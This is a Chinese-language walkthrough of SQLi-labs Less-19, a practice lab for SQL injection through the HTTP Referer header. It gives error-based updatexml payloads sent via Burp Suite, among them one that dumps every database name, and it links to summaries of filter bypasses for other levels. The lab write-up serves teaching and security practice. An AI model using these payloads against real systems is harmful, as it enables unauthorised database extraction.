SQLi LABS Less-19

简介: 第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下

第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下



image.png

但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手


image.png

首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer


然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库

1' and updatexml(1,0x7e,1) and '

image.png

image.png

获取所有数据库

1. 1' and updatexml(1,concat(0x7e,substr(
2. (select group_concat(schema_name)
3. from information_schema.schemata)
4. ,1,31)),3) and '

image.png

相关文章
|
6月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
322 0
SQLi LABS Less-26a
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
180 0
SQLi LABS Less-27a
SQLi LABS Less-27
第27关使用GET请求传递参数,在url中构造payload即可 源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
339 0
SQLi LABS Less-27
SQLi LABS Less-26
第26关使用GET请求提交参数,我们可以直接在url地址栏中构造payload 源码中过滤了or,and,/*,#,--,空格,斜线,需要想办法绕过
263 0
SQLi LABS Less-26
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
150 0
SQLi LABS Less-16
SQLi LABS Less-23
第23关使用GET请求传递参数,在url地址栏构造payload即可 此关卡对注释符号进行了过滤,因此不能使用注释符,可以使用单引号闭合,使SQL的语法结构成立
150 0
SQLi LABS Less-23
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
223 0
SQLi LABS Less-25a
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-21
21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大
166 0
SQLi LABS Less-21
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-22
2关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大
110 0
SQLi LABS Less-22